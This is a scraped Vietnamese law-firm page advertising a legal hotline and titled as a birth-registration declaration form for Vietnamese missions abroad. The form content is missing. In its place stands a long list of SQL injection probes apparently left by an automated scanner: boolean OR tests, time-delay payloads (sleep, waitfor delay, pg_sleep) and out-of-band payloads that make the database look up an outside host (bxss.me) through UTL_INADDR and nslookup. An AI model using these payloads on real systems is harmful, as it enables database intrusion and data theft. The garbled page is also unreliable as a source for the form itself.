Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai đăng kí khai sinh (dùng cho cơ quan đại diện của Việt Nam ở nước ngoài)

Cập nhật lần cuối lúc 11:02 ngày 15/07/2013

Nguồn: Công ty Luật Vinabiz/ Nguoiduatin.vn
1
1
1'"
\
1
1
@@rjol7
JyI=
1
-1 OR 2+636-636-1=0+0+0+1 --
-1 OR 3+636-636-1=0+0+0+1 --
-1 OR 3*2<(0+5+636-636) --
-1 OR 3*2>(0+5+636-636) --
-1 OR 2+171-171-1=0+0+0+1
-1 OR 3+171-171-1=0+0+0+1
-1 OR 3*2<(0+5+171-171)
-1 OR 3*2>(0+5+171-171)
-1' OR 2+973-973-1=0+0+0+1 --
-1' OR 3+973-973-1=0+0+0+1 --
-1' OR 3*2<(0+5+973-973) --
-1' OR 3*2>(0+5+973-973) --
-1' OR 2+976-976-1=0+0+0+1 or 'vU0Nr6tu'='
-1' OR 3+976-976-1=0+0+0+1 or 'vU0Nr6tu'='
-1' OR 3*2<(0+5+976-976) or 'vU0Nr6tu'='
-1' OR 3*2>(0+5+976-976) or 'vU0Nr6tu'='
-1" OR 2+205-205-1=0+0+0+1 --
-1" OR 3+205-205-1=0+0+0+1 --
-1" OR 3*2<(0+5+205-205) --
-1" OR 3*2>(0+5+205-205) --
if(now()=sysdate(),sleep(10.5),0)/*'XOR(if(now()=sysdate(),sleep(10.5),0))OR'"XOR(if(now()=sysdate(),sleep(10.5),0))OR"*/
(select(0)from(select(sleep(10.5)))v)/*'+(select(0)from(select(sleep(10.5)))v)+'"+(select(0)from(select(sleep(10.5)))v)+"*/
-1; waitfor delay '0:0:10.5' --
-1); waitfor delay '0:0:10.5' --
1 waitfor delay '0:0:10.5' --
2Vcd5rjb'; waitfor delay '0:0:21' --
-1;select pg_sleep(21); --
-1);select pg_sleep(21); --
-1));select pg_sleep(31.5); --
TZBKU73j';select pg_sleep(31.5); --
1qa4LvgW');select pg_sleep(31.5); --
17OX8lRK'));select pg_sleep(10.5); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6110.34060.22932.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6111.34060.22932.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6113.34060.22932.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6114.34060.22932.\1.bxss.me
874'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: